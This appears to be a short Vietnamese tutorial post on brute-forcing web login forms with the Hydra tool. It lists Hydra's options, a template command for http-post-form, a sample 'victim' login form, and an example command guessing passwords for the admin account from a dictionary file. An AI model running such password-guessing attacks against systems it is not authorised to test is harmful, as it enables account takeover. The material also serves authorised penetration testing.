Skip to main content

Brute force http forms (tool :Hydra)

Các tùy chọn:

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

-R restore a previous aborted/crashed session
-S connect via SSL
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e ns additional checks, "n" for null password, "s" try login as pass
-C FILE colon seperated "login:pass" format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-v / -V verbose mode / show login+pass combination for each attempt
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd
OPT some service modules need special input (see README!)

Để brute force được form thì service chọn http-{get|post}-form chọn phương thức cho phù hợp(GET|POST).

Cú pháp:hydra -l {username} -P {password list path} -s {port} -f {Site Address} http-post-form "{Path to postback page}:{USERNAME_NAME}=^USER^&{PASSWORD_NAME}=^PASS^:{failed login text

Victim sử dụng phương thức POST
<form method="POST">
<input type="text" name="user" />
<inbut ... name="pass" />
<input type="submit" name="login" />

user=(user input)
pass=(user input)

hydra -l admin -P dictionary.txt http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:đăng nhập sai!"